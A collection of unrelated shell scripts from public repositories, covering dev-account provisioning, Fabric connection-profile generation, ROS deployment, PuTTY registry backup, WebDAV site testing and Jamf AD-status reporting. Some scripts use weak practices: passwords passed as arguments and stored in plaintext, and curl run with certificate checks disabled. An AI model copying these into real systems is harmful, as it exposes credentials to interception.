a13433b83d6398497fb5b764240cebfd25700dce | Shell | hacone/hc_temporary | /34samples-scripts/progress.sh | UTF-8 | 789 | 2.90625 | 3 | [] | no_license | #!/bin/bash
echo -e "\nno. of CHUNKS."
for dir in $(ls filtered/ ); do echo -e "${dir}\t"$( ls filtered/$dir/split/ | wc -l ); done
#echo -e "\nfinished ENCODING"
#echo -e "> For s14-X17"
#for s in $(ls *-s14-encode.log); do echo $s ; grep Done $s | wc -l ; done
#echo -e "> For 14 mons"
#for s in $(ls *-14m-encode.log); do echo $s ; grep Done $s | wc -l ; done
for sample in $( ls /glusterfs/hacone/blast-tmp/ ); do
echo "Alignment for $sample : "$( ls -lah /glusterfs/hacone/blast-tmp/$sample/*/*.sort.read.sam.gz | wc -l )
ls -lahS /glusterfs/hacone/blast-tmp/$sample/*/*.sort.read.sam.gz
echo "Encoding for $sample : "$( ls -lah /glusterfs/hacone/blast-tmp/$sample/*/*.pickle | wc -l )
ls -lahS /glusterfs/hacone/blast-tmp/$sample/*/*.pickle
done
| true |
da26980e354ce8353ae915232b5d4d61b972b856 | Shell | FHead/PhysicsHIJetReco2018 | /CommonCode/script/ScaleHistogramsWithTag.sh | UTF-8 | 820 | 3.09375 | 3 | [] | no_license |
WorkspaceBase=~/work/PhysicsWorkspace/HIJetMass/
InputFolder=CombinedResult
OutputFolder=ScaledResult
CrossSectionFile=$WorkspaceBase/CommonCode/input/SampleCrossSection.input
mkdir -p $OutputFolder
for i in `ls $InputFolder`
do
Tag=${i/.root}
InputFile=$InputFolder/$i
OutputFile=$OutputFolder/$i
if grep -q $Tag $CrossSectionFile
then
CrossSection=`grep $Tag $CrossSectionFile | awk '{print $2}'`
if [ "$CrossSection" != "-1" ]
then
$WorkspaceBase/CommonCode/bin/ScaleHistograms $InputFile $OutputFile $CrossSection $Tag
else
$WorkspaceBase/CommonCode/bin/AttachTags $InputFile ${OutputFile/.root/_NoCrossSection.root} $Tag
fi
else
$WorkspaceBase/CommonCode/bin/AttachTags $InputFile ${OutputFile/.root/_NoSuchSample.root} $Tag
fi
done
| true |
13edef84d94931925842d3cab4e380bee1d86b11 | Shell | jrsouth/Scripts | /createdevuser.sh | UTF-8 | 5,214 | 4 | 4 | [] | no_license | #!/bin/bash
# -----------------------------------------------------------------------------
# Script to set up dev accounts on a web development machine
#
# Creates:
# -- User SSH login
# -- FTP access to home directory (assumes this is available with login creation)
# -- MySQL access to username_* databases (plus .my.cnf file in home directory)
# -- Self-signed SSL key/certificate in ~/.ssl[/certs]
# -- Apache config file (enabled, with graceful reload)
#
# Assumes:
# -- Valid /root/.my.cnf file to enable mysql user creation
# -- Wildcard DNS entry for $SERVERDOMAIN variable (defined below these notes)
# -- chroot'd FTP access for user accounts by default
# -- Apache2 web server correctly configured and running
#
# Issues
# -- No real security (passwords in command history, but are expected to be changed)
# -- No real error-checking, assumes success unless catastrophic failure
# -----------------------------------------------------------------------------
# ------ Variables ------
# Used for apache config file setup
SERVERDOMAIN="domain.com"
# Used for self-signed certificates
SSLCOUNTRY="GB"
SSLSTATE="London"
SSLLOCATION="London"
SSLORGANISATION="Organisation"
# ------ End variables ------
# Check run as root
# (user creation, mysql admin and the apache reload below all need root)
if [ $EUID -ne 0 -o $UID -ne 0 ]
then
echo -e "Error - must be root.\nUsage: createdevuser.sh username password\n" ;
exit 1 ;
fi
# Check username and password arguments provided
if [ $# -ne 2 ]
then
echo -e "Error - incorrect number of parameters\nUsage: createdevuser.sh username password\n" ;
exit 2 ;
fi
# Set up human-readable variables from command line arguments
NEWUSER=$1 ;
NEWPASS=$2 ;
# MD5-crypt hash in the format accepted by useradd -p below
NEWPASS_CRYPT=`openssl passwd -1 $NEWPASS` ;
# Check for existing user
# NOTE(review): this matches any passwd line *starting* with the name,
# so "bob" is also rejected when only "bobby" exists - confirm intended.
egrep "^$NEWUSER" /etc/passwd >/dev/null
if [ $? -eq 0 ]; then
echo -e "Error - user $NEWUSER already exists." ;
exit 3 ;
fi
# Confirm creation
# -s: do not echo the keypress; -n 1: accept a single character
read -s -n 1 -p "Create new user \"$NEWUSER\" with password \"$NEWPASS\"? (y/n)" CONFIRM ; echo ;
if [ "$CONFIRM" != "y" ]
then
echo -e "\nCancelled." ;
exit 4 ;
else
echo -e "\nProcessing:" ;
fi
# Create local user
echo -e -n "Creating local user..."
useradd -m --shell=/bin/bash -p "$NEWPASS_CRYPT" $NEWUSER ;
echo -e -n "Done.\n"
# Create samba user
# Not needed for external host
#echo -e -n "Creating SAMBA user..."
### Should use inline herestring: <<< "
#(echo -e -n "$NEWPASS\n$NEWPASS\n") | sudo smbpasswd -a -s $NEWUSER > /dev/null;
#echo -e -n "$NEWUSER = \"$NEWUSER\"\n" >> /etc/samba/smbusers ;
#echo -e -n "Done.\n"
# Create FTP User
# Actually implicit with succesful user creation but nice to see in the output
echo -e -n "Creating FTP user..."
echo -e -n "Done.\n"
# Create mysql user and .my.cnf file
# Grants full rights on any database named <user>_* and writes a per-user
# .my.cnf so the mysql CLI logs in without prompting.
echo -e -n "Creating mysql user..."
mysql --defaults-extra-file="/root/.my.cnf" -e "GRANT ALL ON \`${NEWUSER}_%\`.* to '$NEWUSER'@'localhost' IDENTIFIED BY '$NEWPASS';" ;
echo -ne "[client]\nuser=$NEWUSER\npassword=$NEWPASS\n" > /home/$NEWUSER/.my.cnf
chown $NEWUSER:$NEWUSER /home/$NEWUSER/.my.cnf
echo -e -n "Done.\n"
# Create self-signed key/certificate for HTTPS
echo -e -n "Creating self-signed SSL certficates..."
mkdir -p /home/$NEWUSER/.ssl/certs
# 2048-bit RSA, unencrypted key (-nodes), valid 5 years (1825 days)
openssl req -nodes -newkey rsa:2048 -x509 -days 1825 \
-subj "/C=$SSLCOUNTRY/ST=$SSLSTATE/L=$SSLLOCATION/O=$SSLORGANISATION/CN=$NEWUSER.$SERVERDOMAIN" \
-keyout /home/$NEWUSER/.ssl/$NEWUSER.$SERVERDOMAIN.key \
-out /home/$NEWUSER/.ssl/certs/$NEWUSER.$SERVERDOMAIN.crt \
> /dev/null 2>&1
chown -R $NEWUSER:$NEWUSER /home/$NEWUSER/.ssl
echo -e -n "Done.\n"
# Create apache site .conf file
# Done inline to keep script self-contained, but maybe not best option for flexibility
# The heredoc delimiter is unquoted, so $NEWUSER/$SERVERDOMAIN expand now,
# while \${APACHE_LOG_DIR} stays literal for Apache to resolve at runtime.
echo -e -n "Creating Apache site config file..."
cat > /etc/apache2/sites-available/$NEWUSER.$SERVERDOMAIN.conf <<EOF
<VirtualHost *:80>
ServerName $NEWUSER.$SERVERDOMAIN
ServerAdmin $NEWUSER@$SERVERDOMAIN
DocumentRoot /home/$NEWUSER/public_html
LogLevel warn
ErrorLog \${APACHE_LOG_DIR}/error.$NEWUSER.$SERVERDOMAIN.log
CustomLog \${APACHE_LOG_DIR}/access.$NEWUSER.$SERVERDOMAIN.log combined
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /home/$NEWUSER/public_html/>
Options All
AllowOverride All
Require all granted
</Directory>
</VirtualHost>
<VirtualHost *:443>
ServerName $NEWUSER.$SERVERDOMAIN
ServerAdmin $NEWUSER@$SERVERDOMAIN
DocumentRoot /home/$NEWUSER/public_html
SSLEngine on
SSLCertificateFile /home/$NEWUSER/.ssl/certs/$NEWUSER.$SERVERDOMAIN.crt
SSLCertificateKeyFile /home/$NEWUSER/.ssl/$NEWUSER.$SERVERDOMAIN.key
</VirtualHost>
EOF
echo -e -n "Done.\n"
echo -e -n "Enabling Apache site config file..."
a2ensite $NEWUSER.$SERVERDOMAIN > /dev/null 2>&1
echo -e -n "Done.\n"
echo -e -n "Loading Apache site config file..."
mkdir -p /home/$NEWUSER/public_html # Make sure folder is there so `apache2ctl configtest` is happy
apache2ctl configtest > /dev/null 2>&1 && apache2ctl graceful > /dev/null 2>&1
echo -e -n "Done.\n"
# Complete
echo -e "\nUser creation complete." ;
echo "--> $NEWUSER.$SERVERDOMAIN is served from /home/$NEWUSER/public_html (which can be a symlink)" ;
exit 0 ;
| true |
af03b7ff43b821f5dcbd7167065085b49d363cb0 | Shell | ammpedro/cloudsim-ed-actuation | /deploy.bash | UTF-8 | 677 | 2.609375 | 3 | [] | no_license | #!/bin/bash
# Source both ROS environments so catkin tools are on PATH.
# NOTE(review): sourcing hydro after groovy means hydro wins for any
# overlapping variables - confirm that is intended.
. /opt/ros/groovy/setup.bash
. /opt/ros/hydro/setup.bash
# Create the catkin workspace layout and the notebook drop directory.
echo "Creating directories..."
mkdir ~/code
mkdir ~/cloudsim/notebook
cd ~/code
mkdir ws
mkdir ws/src
cd ws/src
# Copy the checked-out repo into the workspace source tree.
echo "Transfer repo..."
cp -r ~/cloudsim-ed-actuation ~/code/ws/src
echo "Initializing catkin workspace"
catkin_init_workspace
cd ..
echo "Building catkin workspace"
catkin_make install
. devel/setup.bash
. install/share/cloudsim_ed_actuation/setupx.bash
echo "Webify models for gzweb"
. ~/cloudsim/gzweb/deploy.sh -m local
# Publish the notebooks into cloudsim, then remove the original checkout.
echo "Setup Notebooks"
cp -r src/cloudsim-ed-actuation/cloudsim_ed_actuation/notebooks/. ~/cloudsim/notebook/
echo "Delete repo files"
rm -r ~/cloudsim-ed-actuation
| true |
d4190a2a336186a3c3f85841fbdccac52fc1371d | Shell | faizainur/catena-fabric | /organizations/ccp-generate.sh | UTF-8 | 2,109 | 3.375 | 3 | [] | no_license | #!/bin/bash
function one_line_pem {
  # Flatten a PEM file ($1) into a single line, replacing each newline
  # with an escaped "\n" sequence so it can be spliced into the JSON/YAML
  # connection-profile templates by the sed calls below.
  # NOTE(review): the backslash count relies on backtick command
  # substitution semantics - do not convert to $( ) without re-testing.
  echo "`awk 'NF {sub(/\\n/, ""); printf "%s\\\\\\\n",$0;}' $1`"
}
function json_ccp {
    # Render the JSON connection-profile template, substituting the org
    # name ($1), peer/CA ports ($2, $3) and the flattened PEM material
    # from the certificate files given as $4 (peer TLS) and $5 (CA).
    local peer_pem ca_pem
    peer_pem=$(one_line_pem $4)
    ca_pem=$(one_line_pem $5)
    sed -e "s/\${ORG}/$1/" \
        -e "s/\${P0PORT}/$2/" \
        -e "s/\${CAPORT}/$3/" \
        -e "s#\${PEERPEM}#$peer_pem#" \
        -e "s#\${CAPEM}#$ca_pem#" \
        organizations/ccp-template.json
}
}
function yaml_ccp {
    # Render the YAML connection-profile template with the same five
    # substitutions as json_ccp, then re-indent the escaped newlines so
    # the PEM block is valid YAML.
    local peer_pem ca_pem
    peer_pem=$(one_line_pem $4)
    ca_pem=$(one_line_pem $5)
    sed -e "s/\${ORG}/$1/" \
        -e "s/\${P0PORT}/$2/" \
        -e "s/\${CAPORT}/$3/" \
        -e "s#\${PEERPEM}#$peer_pem#" \
        -e "s#\${CAPEM}#$ca_pem#" \
        organizations/ccp-template.yaml | sed -e $'s/\\\\n/\\\n /g'
}
}
# Generate JSON + YAML connection profiles for each organization.
# bankA: peer on 7051, CA on 7054
ORG=bankA
P0PORT=7051
CAPORT=7054
PEERPEM=organizations/peerOrganizations/bankA.catena.id/tlsca/tlsca.bankA.catena.id-cert.pem
CAPEM=organizations/peerOrganizations/bankA.catena.id/ca/ca.bankA.catena.id-cert.pem
echo "$(json_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankA.catena.id/connection-bankA.json
echo "$(yaml_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankA.catena.id/connection-bankA.yaml
# bankB: peer on 9051, CA on 8054
ORG=bankB
P0PORT=9051
CAPORT=8054
PEERPEM=organizations/peerOrganizations/bankB.catena.id/tlsca/tlsca.bankB.catena.id-cert.pem
CAPEM=organizations/peerOrganizations/bankB.catena.id/ca/ca.bankB.catena.id-cert.pem
echo "$(json_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankB.catena.id/connection-bankB.json
echo "$(yaml_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankB.catena.id/connection-bankB.yaml
# gov: peer on 10051, CA on 10054
ORG=gov
P0PORT=10051
CAPORT=10054
PEERPEM=organizations/peerOrganizations/gov.catena.id/tlsca/tlsca.gov.catena.id-cert.pem
CAPEM=organizations/peerOrganizations/gov.catena.id/ca/ca.gov.catena.id-cert.pem
echo "$(json_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/gov.catena.id/connection-gov.json
echo "$(yaml_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/gov.catena.id/connection-gov.yaml
| true |
7962e03190231556172db2ab4d740900c0420927 | Shell | oldpride/tpsup | /scripts/putty_config | UTF-8 | 1,902 | 3.984375 | 4 | [] | no_license | #!/bin/bash
# $USERPROFILE is from windows env variable %USERPROFILE%
# Kept unexpanded (single quotes) so usage() can print it verbatim; it is
# resolved later via eval once we know we are running under Cygwin.
file_unresolved='$USERPROFILE/Desktop/putty_config.reg'
usage () {
# Print the help text to stderr and exit non-zero. The heredoc delimiter
# is unquoted so $0 and $file_unresolved expand inside the text.
cat >&2 <<EOF
usage:
$0 export
$0 import
$0 check
putty config is stored in windows registry, therefore, when desktop is rebuilt, (for example,
in citrix environment, desktop is virtual and is moved around without copying over registry),
putty config is lost.
we use this script to export/import putty config into/from a file, which can be backed up.
this script can only be run from cygwin. config is saved to
$file_unresolved,
where \$USERPROFILE is from windows env variable %USERPROFILE%
-c internally call cmd.exe, as "cmd /c regedit ...".
default to run from cygwin directly as "regedit ..."
If you get error "...regedit: permission denied", then you need to run cygwin as
administrator: right click cygwin icon->Run as Administrator.
EOF
exit 1
}
UseCmd=N
# -c: run regedit through cmd.exe instead of invoking it directly.
while getopts c o;
do
case "$o" in
c) UseCmd=Y;;
#u) id=$OPTARG;;
*) usage;;
esac
done
shift $((OPTIND-1))
if [ $# -ne 1 ]; then
echo "wrong number of args" >&2
usage
fi
action=$1
# Refuse to run outside Cygwin (regedit and %USERPROFILE% are Windows-side).
UNAME=`uname -a`
if ! [[ $UNAME =~ Cygwin ]]; then
echo "ERROR: this script can only be run on Cygwin. current UNAME=$UNAME." >&2
exit 1
fi
# Resolve the $USERPROFILE placeholder kept literal at the top of the file.
eval "file=$file_unresolved"
if [ $action = export ]; then
if [ $UseCmd = Y ]; then
(set -x; cmd /c "regedit /e $file HKEY_CURRENT_USER\\Software\\SimonTatham")
else
(set -x; regedit /e $file HKEY_CURRENT_USER\\Software\\SimonTatham )
fi
elif [ $action = import ]; then
if [ $UseCmd = Y ]; then
(set -x; cmd /c "regedit /i $file")
else
(set -x; regedit /i $file )
fi
elif [ $action = check ]; then
(set -x; ls -l $file )
else
echo "ERROR: unsupported action='$action'" >&2
usage
fi
| true |
200bdb2c5ca5685c81507076d151e9dabb1ac0f4 | Shell | sylvathle/sblunier_webdav | /Monitoring/GenerateGridReport/testFile.sh | UTF-8 | 10,693 | 3.21875 | 3 | [] | no_license | #! /bin/bash
# Require the cloud argument: a cloud name such as DE, or "all".
if [ "$1" == "" ]
then
echo argument 1 = cloud or all '(ex: DE)'
exit 1
fi
function getSiteParams {
  # Look up datadisk $1 in infoSites.txt, a sequence of 3-line records:
  #   line 0: site/datadisk name
  #   line 1: storage type
  #   line 2: storage version
  # Sets the globals typeStorage and storageVersion for the report.
  # Fixes vs. original: "$1" is quoted so names containing glob
  # characters or spaces cannot break the comparison; read -r keeps
  # backslashes literal; the output globals are reset first so a site
  # missing from infoSites.txt no longer reports the values left over
  # from the previous lookup.
  local iterator=0
  local foundSite=0
  local line
  typeStorage=""
  storageVersion=""
  while read -r line
  do
    # A record is exactly three lines; start a fresh one after the third.
    if [ "$iterator" -eq 3 ]; then
      iterator=0
      foundSite=0
    fi
    if [ "$line" = "$1" ]; then
      foundSite=1
    fi
    if [ "$foundSite" -eq 1 ]; then
      if [ "$iterator" -eq 1 ]; then
        typeStorage=$line
      elif [ "$iterator" -eq 2 ]; then
        storageVersion=$line
      fi
    fi
    ((iterator=iterator+1))
  done < infoSites.txt
}
function RedList {
  # Set the global flag isInRedList to 1 if datadisk $1 appears verbatim
  # as a line of redList.txt (sites with WebDAV disabled), 0 otherwise.
  # Fixes vs. original: "$1" is quoted so names containing glob
  # characters or spaces compare correctly; read -r keeps backslashes
  # literal.
  isInRedList=0
  local list
  while read -r list
  do
    if [ "$list" = "$1" ]; then
      isInRedList=1
    fi
  done < redList.txt
}
#proxy=$X509_USER_PROXY
#proxy=${proxy#/tmp/}
#cp $X509_USER_PROXY .
# Build the davix test client used for the read test below.
cd testDavix
make
cd ..
# Expected curl/HTTP outcome strings, each paired with its counter.
http200="HTTP/1.1 200 OK"
ithttp200=0
http400="HTTP/1.1 400 Bad Request"
ithttp400=0
http403a="HTTP/1.1 403 Storage area ATLASDATADISK-FS doesn't support https protocol"
ithttp403a=0
http403b="HTTP/1.1 403 Forbidden"
ithttp403b=0
http404="HTTP/1.1 404 Not Found"
ithttp404=0
http500="HTTP/1.1 500 Internal Server Error"
ithttp500=0
httpFailConnect="curl: (7) couldn't connect to host"
ithttpFailConnect=0
#httpFailConnect="curl: (7)"
httpsslError="curl: (35) SSL connect error"
httptimeout1="Operation timed out"
httptimeout2="connect() timed out"
ithttpsslError=0
# Global tallies used by the summary pie charts at the bottom.
totalDatadisks=0
successDatadisks=0
itHasNotWebDAV=0
itHasNoFile=0
davixSuccess=0
ithttptimeout=0
#httpsslError="curl: (35)"
# Start the LaTeX report from scratch.
rm Report/testFile.tex
# All-clouds mode: walk every cloud directory. Each listFilePerSite.txt
# alternates datadisk-name lines and test-URL lines (or the word "empty").
if [[ $1 == 'all' ]]; then
for cloud in $(ls ../Clouds)
do
iterlistfile=0
#cloud="DE"
echo '\subsection{'$cloud$'}\n'>>Report/testFile.tex
while read line
do
((iterlistfile=iterlistfile+1))
# Odd lines carry the datadisk name, even lines the file URL.
if [[ $iterlistfile == 1 ]]; then
datadisk=$line
continue
elif [[ $iterlistfile == 2 ]]; then
iterlistfile=0
fi
((totalDatadisks=totalDatadisks+1))
datadiskforlatex=${datadisk//_/\\_}
result=0
now=$(date +"%d/%m/%y at %T")
# Skip sites known to have WebDAV disabled (sets isInRedList).
RedList $datadisk
if [[ $isInRedList == 1 ]]; then
((itHasNotWebDAV=itHasNotWebDAV+1))
curlOutput="WebDAV not enabled"
mainOutPut="Davix not tested"
result=0
curlColor='red'
elif [[ $line == "empty" ]]; then
echo $line
file='No file found on this datadisk'
((itHasNoFile=itHasNoFile+1))
curlOutput='No file could be tested'
mainOutPut='No file could be tested'
color='red'
curlColor='red'
else
# Probe the URL with a HEAD request, then classify the response text.
test1=$(curl -LI -m 30 --capath /etc/grid-security/certificates/ --cacert $X509_USER_PROXY --cert $X509_USER_PROXY $line 2>&1)
file=`expr match "$line" '\(.*?\)'`
size=${#file}-1
file=${file:0:$size}
if [[ $test1 =~ "$http200" ]]; then
result=1
((ithttp200=ithttp200+1))
curlOutput=$'good'
curlColor='green'
elif [[ $test1 =~ "$http400" ]]; then
((ithttp400=ithttp400+1))
curlOutput="$http400"
curlColor='red'
elif [[ $test1 =~ "$http403a" ]]; then
((ithttp403a=ithttp403a+1))
curlOutput="$http403a"
curlColor='red'
elif [[ $test1 =~ "$http403b" ]]; then
((ithttp403b=ithttp403b+1))
curlOutput="$http403b"
curlColor='red'
elif [[ $test1 =~ "$http404" ]]; then
((ithttp404=ithttp404+1))
curlOutput="$http404"
curlColor='red'
elif [[ $test1 =~ "$http500" ]]; then
((ithttp500=ithttp500+1))
curlOutput="$http500"
curlColor='red'
elif [[ $test1 =~ "$httpFailConnect" ]]; then
((ithttpFailConnect=ithttpFailConnect+1))
curlOutput="$httpFailConnect"
curlColor='red'
elif [[ $test1 =~ "$httpsslError" ]]; then
((ithttpsslError=ithttpsslError+1))
curlOutput="$httpsslError"
curlColor='red'
elif [[ $test1 =~ "$httptimeout1" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout1"
curlColor='red'
elif [[ $test1 =~ "$httptimeout2" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout2"
curlColor='red'
else
curlOutput="New curl error that has to be identified">>Report/testFile.tex
curlColor='red'
fi
echo $line
# Only run the davix read test when the curl HEAD probe succeeded.
if [[ $result == 1 ]]; then
test2=$(./testDavix/main $line)
if [ $? -eq 0 ]; then
mainOutPut="Davix test Ok"
((davixSuccess=davixSuccess+1))
else
mainOutPut="Davix test Failed"
result=0
fi
echo $test2
else
mainOutPut="Davix not tested"
result=0
fi
fi
#fill the report
if [[ $result == 1 ]]; then
color='green'
((successDatadisks=successDatadisks+1))
else
color='red'
fi
getSiteParams $datadisk
echo '\rule{\textwidth}{1pt}'$'\\\\\n'>>Report/testFile.tex
echo '\textcolor{'$color'}{\normalsize{'$datadiskforlatex$'}}\\\\\n'>>Report/testFile.tex
echo 'Storage:' $typeStorage', version: '$storageVersion$'\\\\\n'>>Report/testFile.tex
echo $'File tested:\\\\'>>Report/testFile.tex
echo '\footnotesize{'${file//_/\\_}$'}\\\\\n'>>Report/testFile.tex
echo 'date: '$now$'\\\\\n'>>Report/testFile.tex
echo 'curl output: ' '\textcolor{'$curlColor'}{'$curlOutput$'}\\\\\n'>>Report/testFile.tex
echo 'davix result: ' '\textcolor{'$color'}{'$mainOutPut$'}\\\\\n'>>Report/testFile.tex
#echo '-----------------------------------------------------------'
done < ../Clouds/$cloud/listFilePerSite.txt
done
else
# Single-cloud mode: same per-datadisk processing, for cloud $1 only.
iterlistfile=0
cloud=$1
echo '\subsection{'$cloud$'}\n'>>Report/testFile.tex
while read line
do
((iterlistfile=iterlistfile+1))
if [[ $iterlistfile == 1 ]]; then
datadisk=$line
continue
elif [[ $iterlistfile == 2 ]]; then
iterlistfile=0
fi
((totalDatadisks=totalDatadisks+1))
datadiskforlatex=${datadisk//_/\\_}
result=0
now=$(date +"%d/%m/%y at %T")
#test1=$(curl -LI --capath /etc/grid-security/certificates/ --cacert $X509_USER_PROXY --cert $X509_USER_PROXY $line 2>&1)
RedList $datadisk
if [[ $isInRedList == 1 ]]; then
((itHasNotWebDAV=itHasNotWebDAV+1))
curlOutput="WebDAV not enabled"
mainOutPut="Davix not tested"
result=0
curlColor='red'
elif [[ $line == "empty" ]]; then
echo $line
file='No file found on this datadisk'
((itHasNoFile=itHasNoFile+1))
curlOutput='No file could be tested'
mainOutPut='No file could be tested'
color='red'
curlColor='red'
else
test1=$(curl -LI -m 30 --capath /etc/grid-security/certificates/ --cacert $X509_USER_PROXY --cert $X509_USER_PROXY $line 2>&1)
file=`expr match "$line" '\(.*?\)'`
size=${#file}-1
file=${file:0:$size}
if [[ $test1 =~ "$http200" ]]; then
result=1
((ithttp200=ithttp200+1))
curlOutput=$'good'
curlColor='green'
elif [[ $test1 =~ "$http400" ]]; then
((ithttp400=ithttp400+1))
curlOutput="$http400"
curlColor='red'
elif [[ $test1 =~ "$http403a" ]]; then
((ithttp403a=ithttp403a+1))
curlOutput="$http403a"
curlColor='red'
elif [[ $test1 =~ "$http403b" ]]; then
((ithttp403b=ithttp403b+1))
curlOutput="$http403b"
curlColor='red'
elif [[ $test1 =~ "$http404" ]]; then
((ithttp404=ithttp404+1))
curlOutput="$http404"
curlColor='red'
elif [[ $test1 =~ "$http500" ]]; then
((ithttp500=ithttp500+1))
curlOutput="$http500"
curlColor='red'
elif [[ $test1 =~ "$httpFailConnect" ]]; then
((ithttpFailConnect=ithttpFailConnect+1))
curlOutput="$httpFailConnect"
curlColor='red'
elif [[ $test1 =~ "$httpsslError" ]]; then
((ithttpsslError=ithttpsslError+1))
curlOutput="$httpsslError"
curlColor='red'
elif [[ $test1 =~ "$httptimeout1" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout1"
curlColor='red'
elif [[ $test1 =~ "$httptimeout2" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout2"
curlColor='red'
else
curlOutput="New curl error that has to be identified">>Report/testFile.tex
curlColor='red'
fi
echo $line
if [[ $result == 1 ]]; then
# NOTE(review): this branch invokes ./main while the all-clouds branch
# invokes ./testDavix/main - confirm which path is correct.
test2=$(./main $line)
if [ $? -eq 0 ]; then
mainOutPut="Davix test Ok"
((davixSuccess=davixSuccess+1))
else
mainOutPut="Davix test Failed"
result=0
fi
else
mainOutPut="Davix not tested"
result=0
fi
fi
#fill the report
if [[ $result == 1 ]]; then
color='green'
((successDatadisks=successDatadisks+1))
else
color='red'
fi
getSiteParams $datadisk
#echo '\rule{\textwidth}{1pt}'$'\\\\\n'
echo '\rule{\textwidth}{1pt}'$'\\\\\n'>>Report/testFile.tex
echo '\textcolor{'$color'}{\normalsize{'$datadiskforlatex$'}}\\\\\n'>>Report/testFile.tex
echo 'Storage:' $typeStorage', version: '$storageVersion$'\\\\\n'>>Report/testFile.tex
echo $'File tested:\\\\'>>Report/testFile.tex
echo '\footnotesize{'${file//_/\\_}$'}\\\\\n'>>Report/testFile.tex
echo 'date: '$now$'\\\\\n'>>Report/testFile.tex
echo 'curl output: ' '\textcolor{'$curlColor'}{'$curlOutput$'}\\\\\n'>>Report/testFile.tex
echo 'davix result: ' '\textcolor{'$color'}{'$mainOutPut$'}\\\\\n'>>Report/testFile.tex
#echo '-----------------------------------------------------------'
done < ../Clouds/$cloud/listFilePerSite.txt
fi
# --- Summary charts: curl outcome pie, davix pie, time evolution ---
rm Report/testFileCanvas.tex
cd PieChart/curl/
echo $ithttp200 $ithttp403a $ithttp403b $ithttp404 $ithttp500 $ithttpFailConnect $ithttpsslError $itHasNotWebDAV $itHasNoFile $ithttp400 $ithttptimeout
make clean
make
./main $ithttp200 $ithttp403a $ithttp403b $ithttp404 $ithttp500 $ithttpFailConnect $ithttpsslError $itHasNotWebDAV $itHasNoFile $ithttp400 $ithttptimeout
cp canvas.eps ../../Report/Img/curlPiecanvas.eps
cd ../..
echo '\includegraphics[width=\textwidth]{curlPiecanvas.eps}'>>Report/testFileCanvas.tex
# NOTE(review): $total is computed but never used afterwards.
((total=ithttp200+ithttp403a+ithttp403b+ithttp404+ithttp500+ithttpFailConnect+ithttpsslError+itHasNotWebDAV+itHasNoFile+ithttp400))
((failedDatadisks=totalDatadisks-davixSuccess))
cd PieChart/davix/
echo $davixSuccess $failedDatadisks
make clean
make
./main $davixSuccess $failedDatadisks
cp canvas.eps ../../Report/Img/davixPiecanvas.eps
cd ../..
echo '\includegraphics[width=\textwidth]{davixPiecanvas.eps}'>>Report/testFileCanvas.tex
# Append today's success count and regenerate the history plot.
cd TimeEvolution/curl
echo $(date +"%d/%m/%y")$'\t'$ithttp200 >>curlsuccess.txt
make clean
make
./main
cp canvas.eps ../../Report/Img/timeEvolutioncanvas.eps
cd ../..
echo '\includegraphics[width=\textwidth]{timeEvolutioncanvas.eps}'>>Report/testFileCanvas.tex
#echo '\includegraphics[width=\textwidth]{../TimeEvolution/davix/canvas.eps}'>>Report/testFileCanvas.tex
| true |
ac6c3f58e237eb8e70ce3331b9be98b4c5987d86 | Shell | wikitongues/Library-of-Congress | /reset.sh | UTF-8 | 319 | 3.296875 | 3 | [] | no_license | #!/bin/bash
# Parse flags: -d selects the dev config; all other args are preserved.
dev=false
args=()
while (( $# )); do
  case "$1" in
    -d) dev=true ;;
    *) args+=("$1") ;;
  esac
  shift
done
set -- "${args[@]}"

# BUG FIX: tilde is not expanded when it comes from a quoted string or a
# variable expansion, so source '~/loc-config' looked for a file literally
# named "~/loc-config". Build the path from $HOME instead.
loc_config="$HOME/loc-config"
if [[ $dev == true ]]; then
  loc_config="$HOME/loc-config-dev"
fi

source "$loc_config"

# Abort if the cd fails so the rm -rf below cannot run in the wrong
# directory.
cd "$LOC_PreRelease" || exit 1
rm -rf loc*
loc-test
loc-prepare *
cd loc*
f8696c938e9441b7e9f54bfa1701f7cfc33bf900 | Shell | ryanmoon/public_scripts | /check_ad_jss.sh | UTF-8 | 1,483 | 3.265625 | 3 | [] | no_license | #!/bin/bash
# Variables
# JSS endpoint and API credentials used to upload the extension attribute.
apiURL="https://your.jss.com:8443"
apiUser="EA_API_USER"
apiPass="EA_API_PASSWORD"
###### Do not edit below this line
# Flush the macOS directory-services cache before probing AD.
dscacheutil -flushcache
sleep 5
# Check if the computer is on the network by reading its own computer object from AD
# Get Domain from full structure, cut the name and remove space.
ShortDomainName=`dscl /Active\ Directory/ -read . | grep SubNodes | sed 's|SubNodes: ||g'`
computer=$(dsconfigad -show | grep "Computer Account" | awk '{ print $4 }')
dscl /Active\ Directory/$ShortDomainName/All\ Domains -read /Computers/$computer RecordName &>/dev/null
if [ ! $? == 0 ] ; then
# NOTE(review): this assignment is dead - the script exits before the
# failure result is ever uploaded to the JSS. Confirm that is intended.
result="No connection to the domain"
exit 1
else
result="Connected to $ShortDomainName"
fi
# Upload result of AD connection test
# Build the extension-attribute XML payload expected by the JSS API.
echo "<computer>" > /private/tmp/EA.xml
echo "	<extension_attributes>" >> /private/tmp/EA.xml
echo "	 <extension_attribute>" >> /private/tmp/EA.xml
echo "	 <name>AD Connection Status</name>" >> /private/tmp/EA.xml
echo "	 <value>$result</value>" >> /private/tmp/EA.xml
echo "	 </extension_attribute>" >> /private/tmp/EA.xml
echo "	 </extension_attributes>" >> /private/tmp/EA.xml
echo "</computer>" >> /private/tmp/EA.xml
# PUT the payload against the machine record identified by its serial.
serial=$(system_profiler SPHardwareDataType | grep 'Serial Number (system)' | awk '{print $NF}')
echo $serial
curl -sfku $apiUser:$apiPass $apiURL/JSSResource/computers/serialnumber/$serial/subset/extensionattributes -T /private/tmp/EA.xml -X PUT
sleep 5
#rm /private/tmp/EA.xml
exit 0
| true |
